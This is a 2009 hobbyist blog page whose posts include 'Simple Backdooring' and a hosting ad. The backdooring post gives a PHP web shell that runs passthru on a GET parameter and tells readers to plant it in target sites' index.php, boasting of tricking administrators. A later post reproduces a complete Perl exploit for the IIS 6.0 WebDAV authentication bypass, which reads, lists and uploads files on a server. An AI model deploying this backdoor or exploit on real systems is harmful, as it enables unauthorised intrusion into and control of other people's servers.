oralpc.net - Talk PC Easily

Simple Backdooring

13 Nov 2009

Long time no see, and long time i am not posting here.

I tired, long time build this web but my page rank still “0″ zero. But, the long time i have been thinking and i have conclusion, i must not posting for anything. Just do post !

Ok, this time I will give you some more tricks in security. What have you done when found some website with bugs there, put a backdoor? What backdoor if you did not find the root access?

Some people using CGI Telnet, and another use C99 shell or r57 shell.

But my tricks do same with very simple script, I called simple backdooring. Just do it on your target. Put this code into the index.php in the top of script.

< ?php
 
// This is simple backdooring tricks
// do it with your risk
 
$cmd = $_GET['cmd'];
 
if(isset($cmd))
{
 echo "<pre>";
 echo passthru($cmd);
 echo "< /pre>";
 exit;
}
 
?>

If you put this into index.php on www.example.com, when you click just www.example.com there is nothing happen, but try the www.example.com/index.php?cmd=id see what do you get.

More website administrator have been tricked with this tricks.

Happy backdooring !!!

(3) Comments

Vexxhost Webhost Review

In: Information

9 Jun 2009

With only $4.49 a month, you can get most powerfull hosting in vexxhost, with support FFMEG features.

Vexxhost has four options on their shared hosting. Starter, Standard, Advanced, and Unlimited Plus. For Starter optional, the FFMEG is unsupported. FFMEG supported begin with Standard option.

FFMEG is a complete, cross-platform solution to record, convert and stream audio and video. It includes libavcodec – the leading audio/video codec library.

Beside the FFMEG support, vexxhost hosting support streaming video and audio, real Audio & video Support, etc. All features are in one control panel; cpanel.

They are using cpanel version 11.

So, what are you waiting? Come and get revolution with vexxhost web hosting.

(4) Comments

En/Disable PHP register_globals

In: Web

1 Jun 2009

You can learn more on what register globals is by using the link http://us2.php.net/register_globals

For those wishing to turn on or turn off PHP register_globals, you can edit files within your account to set this setting locally. Depending on if the machine you are on is using PHPSUEXEC or not will determine which method you use.

For NON-PHPsuexec servers:

Using a file manager from cPanel or FTP: locate the “.htaccess” file located in each directory *NOTE* If you want this setting for your entire site, edit the .htaccess in public_html if not, edit the .htaccess file within the folder you want it for.
Once you have this file opened with an editor, add the below line onto a new line in the file: php_flag register_globals off (Change it to On to turn it on)
Save the file, and your done!

No Comments

IIS 6.0 Webdav Exploit

In: Computer Security

30 May 2009

There is an exploit for IIS 6.0 Webdav Remote Authentification Bypass bug wrote in Perl.

#!/usr/bin/perl -W
#
# Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
# written by ka0x <ka0x01 [alt+64]gmail.com>
#
# Greets: an0de, Piker, xarnuz, NullWave07, Pepelux, k0rde, JoSs, Trancek and others!
 
use IO::Socket ;
 
my ( $host, $path ) = @ARGV ;
my $port = 80 ; # webserver port
 
&usage unless $ARGV[1] ;
 
$host =~ s/http:\/\/// if($host =~ /^http:\/\//i) ;
$path =~ s/\/// if(substr($path, 0,1) eq '/');
 
sub _file {
	$file = shift ;
	open(FILE, $file) || die "[-] ERROR: ".$!,"\n" ;
	while( <file> ){
		$cont .= $_ ;
	}
	close(FILE) ;
	return $cont ;
}
 
 
print "write 'help' for get help list\n";
 
 
while( 1 ) {
 
	my $sock = IO::Socket::INET->new (PeerAddr => $host, 
					PeerPort => $port,
					Proto    => 'tcp') || die "\n[-] ERROR: ".$!,"\n" ;
	print "\$> ";
	chomp( my $option = <stdin> ) ;
	last if $option eq 'quit' ;
 
	if($option eq 'source') {
		$path =~ s/\//%c0%af\// ; 
		print $sock "GET /".$path." HTTP/1.1\r\n" ; 
		print $sock "Translate: f\r\n" ;
		print $sock "Host: ".$host."\r\n" ;
		print $sock "Connection: close\r\n\r\n" ;
 
		while(< $sock>){
			print $_ ;
		}
		close($sock) ;
	}
 
 
	elsif($option eq 'path') {
		$path =~ s/\//%c0%af\// ;
		print $sock "PROPFIND  /".$path." HTTP/1.1\r\n" ;
		print $sock "Host: ".$host."\r\n" ;
		print $sock "Connection:close\r\n" ;
		print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
		print $sock "Content-Length: 0\r\n\r\n" ;
		print $sock  '< ?xml version="1.0" encoding="utf-8"?><d :propfind xmlns:D="DAV:"></d><d :prop xmlns:R="http://www.foo.bar/boxschema/"><r :bigbox/><r :author/><r :DingALing/><r :Random/></d>' ;
 
		while(< $sock>){
			print $_ ;
		}
		close($sock) ;
	}
 
 
	elsif($option eq 'put') {
		$path =~ s/\//%c0%af\// ;
		print "[*] Insert a local file (ex: /root/file.txt): " ;
		chomp( $local = </stdin><stdin> ) ;
		$file_l = _file( $local ) ;
		print $sock "PUT /".$path."my_file.txt HTTP/1.1\r\n" ;
		print $sock "Host: ".$host."\r\n" ;
		print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
		print $sock "Connection:close\r\n" ;
		print $sock "Content-Length: ".length($file_l)."\r\n\r\n" ;
		print $sock $file_l,"\r\n" ;
 
		while(< $sock>){
			print $_ ;
		}
		close($sock) ;
	}
 
	elsif($option eq 'help') {
		print "\n\t\t- OPTIONS -\n\n\n" ;
		print "\thelp\t\tgive this help list\n" ;
		print "\tsource\t\tget file content\n" ;
		print "\tpath\t\tget directory contents\n" ;
		print "\tput\t\tput file\n" ;
		print "\tquit\t\texit exploit\n\n" ;
	}
 
}
 
sub usage {
	print < < 'EOH' ;
 
  $ Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
  $ written by ka0x <ka0x01[at]gmail.com>
  $ 25/05/2009
 
usage:
   perl $0 <host> <path>
 
example:
   perl $0 localhost dir/
   perl $0 localhost dir/file.txt
 
EOH
 
	exit;
}
</path></host></stdin></file></ka0x01>